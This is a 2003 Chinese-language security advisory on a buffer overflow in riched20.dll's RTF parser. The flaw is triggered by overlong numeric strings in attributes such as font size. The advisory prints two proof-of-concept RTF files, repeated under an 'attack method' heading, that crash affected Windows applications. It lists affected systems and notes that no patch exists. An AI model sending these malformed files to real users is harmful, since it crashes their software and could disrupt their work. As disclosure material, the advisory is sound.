积极预防 及时发现
快速响应 力保恢复
Riched20.DLL属性标签缓冲溢出缺陷 (MS,缺陷)
发布时间:2003-02-20 信息来源:管理员

涉及程序: riched20.dll 描述: Riched20.DLL属性标签缓冲溢出缺陷 详细: riched20.dll中存在一个缓冲溢出缺陷,在使用相应的DLL模块时,能导致程序崩溃,但很难用来执行其他代码。这个缺陷存在于解析RTF文件的代码中,并且在文件格式的图形数字串(例如字符的大小)处理不当时,引发缓冲溢出。 下列RTF 文件可能导致非法操作: {\\rtf1\\ansi\\ansicpg936\\deff0\\deflang1033\\deflangfe2052{\\fonttbl{\\f0 \\fnil\\fprq2\\fcharset134 \\\`cb\\\`ce\\\`cc\\\`e5;}} {\\colortbl ;\\red255\\green0\\blue255;} \\viewkind4\\uc1\\pard\\cf1\\kerning2\\f0 \\fs18121111111111111111111111111111111110000 www.yoursft.com\\fs20\\par } “\\fs”用于装载“ www.yoursft.com”的大小,当数字串大小达到或超过1024字节时,将引发缓冲溢出;并且,当达到或超过65536字节时,将导致应用程序崩溃。不但“\\fs”的设置会出现这种问题,其他属性也能引起类似的问题。下列RTF文件到同样导致出现非法操作: {\\rtf1\\ansi\\ansicpg936\\deff0\\deflang1033\\deflangfe2052{\\fonttbl{\\f0 \\fnil\\fprq2\\fcharset134 \\\`cb\\\`ce\\\`cc\\\`e5;}} {\\colortbl ;\\red255\\green0\\blue255;} \\viewkind4\\uc1\\pard\\cf1\\kerning2\\f0121111111111111111111111111111111112222 \\fs180 www.yoursft.com\\fs20\\par } 很多软件都存在类似的缺陷。攻击者通过发送一个包含此类缺陷的恶意信息给用户,用户一旦阅读信息,将导致程序崩溃。 受影响的系统: Microsoft Windows 98 Microsoft Windows 2000 Microsoft Windows XP 该缺陷还可能存在于其他操作系统中,但未经测试。 攻击方法: 示例代码1: {\\rtf1\\ansi\\ansicpg936\\deff0\\deflang1033\\deflangfe2052{\\fonttbl{\\f0 \\fnil\\fprq2\\fcharset134 \\\`cb\\\`ce\\\`cc\\\`e5;}} {\\colortbl ;\\red255\\green0\\blue255;} \\viewkind4\\uc1\\pard\\cf1\\kerning2\\f0 \\fs18121111111111111111111111111111111110000 www.yoursft.com\\fs20\\par } 示例代码2: {\\rtf1\\ansi\\ansicpg936\\deff0\\deflang1033\\deflangfe2052{\\fonttbl{\\f0 \\fnil\\fprq2\\fcharset134 \\\`cb\\\`ce\\\`cc\\\`e5;}} {\\colortbl ;\\red255\\green0\\blue255;} \\viewkind4\\uc1\\pard\\cf1\\kerning2\\f0121111111111111111111111111111111112222 \\fs180 www.yoursft.com\\fs20\\par } 解决方案: 目前厂商还未公布此缺陷的补丁,请用户及时关注厂商站点: www.microsoft.com